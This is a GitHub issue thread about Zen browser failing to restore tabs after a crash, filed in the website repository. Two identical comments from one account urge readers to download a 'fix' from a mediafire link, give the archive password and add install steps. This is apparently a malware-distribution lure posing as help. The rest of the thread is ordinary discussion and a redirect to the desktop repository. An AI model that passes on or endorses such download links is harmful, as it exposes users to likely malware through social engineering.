### ISSUE TITLE
Restore tabs after crash

### ISSUE THREAD

**Issue by DutchPete** [zen-browser/www#114]
I accidentally ran my computer battery empty resulting in all my open apps, incl. Zen, crashing. When I switched on my computer again, Zen was there but it could not restore the tabs that were open at the time of the crash. I had to quit and relaunch Zen.

When the computer crashes Zen should quit and be started up manually so tabs will be restored automatically.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DutchPete** [comment]
Why is Krishlo's comment not shown?


![image](https://github.com/user-attachments/assets/b56d1d4c-8ae9-4051-8f43-3c6bef7a0f6e)

**Comment by NOCanoa** [comment]
this is the website repo,
browser relate here pls
https://github.com/zen-browser/desktop/issues
